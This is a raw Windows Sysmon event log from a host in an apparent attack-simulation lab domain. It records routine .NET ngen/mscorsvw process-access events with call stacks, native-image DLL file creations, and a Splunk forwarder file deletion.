21:03:34.628{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3303-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.628{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3303-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.612{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28C5202C9B5D84F66FA4AC458DF62E43,SHA256=916474E125A5FE5C59F687DB82F93035E8C2C258A9117C9B21AABA88FDABB72F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3203-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.565{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3203-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.565{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3203-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:34.534{4DB9351A-A1A6-60D3-3103-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1004-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-06-23 21:03:34.534 10341000x800000000000000020094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.472{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3103-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.456{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3103-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.456{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3103-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.409{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3003-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.394{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3003-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.394{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3003-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:34.331{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1980-0\Microsoft.GroupPolicy.Targeting.dll2021-06-23 21:03:34.331 10341000x800000000000000020152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.972{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-4003-00000000CF01}6724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.956{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-4003-00000000CF01}6724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.956{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-4003-00000000CF01}6724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.909{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3F03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.893{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3F03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.893{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3F03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.878{4DB9351A-A1A7-60D3-3E03-00000000CF01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e9c-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-06-23 21:03:35.862 10341000x800000000000000020145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3E03-00000000CF01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.768{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3E03-00000000CF01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.768{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3E03-00000000CF01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.737{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3D03-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.690{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3D03-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 